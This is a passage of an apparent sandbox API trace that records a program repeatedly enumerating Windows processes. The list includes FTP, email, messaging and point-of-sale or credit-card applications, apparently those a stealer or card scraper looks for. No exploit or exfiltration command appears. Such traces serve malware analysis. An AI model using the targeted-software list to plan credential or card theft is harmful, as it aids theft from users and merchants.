lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0232.789] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.791] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.792] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0232.798] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0232.800] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0232.801] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.803] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0232.805] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0232.807] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.814] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0232.816] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0232.818] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0232.820] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0232.822] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0232.897] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0232.899] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0232.900] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0232.902] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0232.904] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0232.906] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0232.908] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0232.910] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0232.911] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0232.913] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0232.914] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0232.916] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0232.917] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0232.922] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0232.924] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0232.925] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0232.927] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0232.928] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0232.929] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0232.931] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0232.932] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0232.954] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0232.956] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0232.958] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0232.959] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0232.961] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0232.963] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0232.968] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0232.970] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0232.971] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0232.973] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0232.975] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0232.977] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0232.978] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0232.980] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0232.986] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0232.987] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0232.989] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0232.991] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0232.993] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0232.994] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0233.031] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0233.033] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0233.035] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0233.037] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0233.038] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0233.040] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0233.042] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0233.044] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0233.048] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0233.050] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0233.052] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0233.053] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0233.055] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0233.056] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0233.058] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0233.063] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0233.064] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0233.066] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0233.067] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0233.069] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.070] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.072] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.073] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.143] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0233.145] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0233.146] CloseHandle (hObject=0x17b0) returned 1 [0233.146] Sleep (dwMilliseconds=0x64) [0233.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0233.298] Process32First (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.300] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: 